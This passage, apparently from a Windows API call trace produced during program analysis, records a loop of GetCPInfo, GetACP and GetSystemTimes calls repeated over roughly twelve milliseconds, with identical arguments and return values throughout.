lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.357] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.357] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.357] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.358] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.358] GetACP () returned 0x4e4 [0130.358] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.359] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.359] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.359] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.360] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.360] GetACP () returned 0x4e4 [0130.360] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.361] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.361] GetACP () returned 0x4e4 [0130.361] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.362] GetACP () returned 0x4e4 [0130.362] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.362] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.363] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.363] GetACP () returned 0x4e4 [0130.363] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.364] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.364] GetACP () returned 0x4e4 [0130.364] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.365] GetACP () returned 0x4e4 [0130.365] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.365] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.366] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.366] GetACP () returned 0x4e4 [0130.366] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.367] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.367] GetACP () returned 0x4e4 [0130.367] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.368] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0130.368] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0130.368] GetACP () returned 0x4e4 [0130.369] GetSystemTimes (in: lpIdleTime=0x18fa9c, 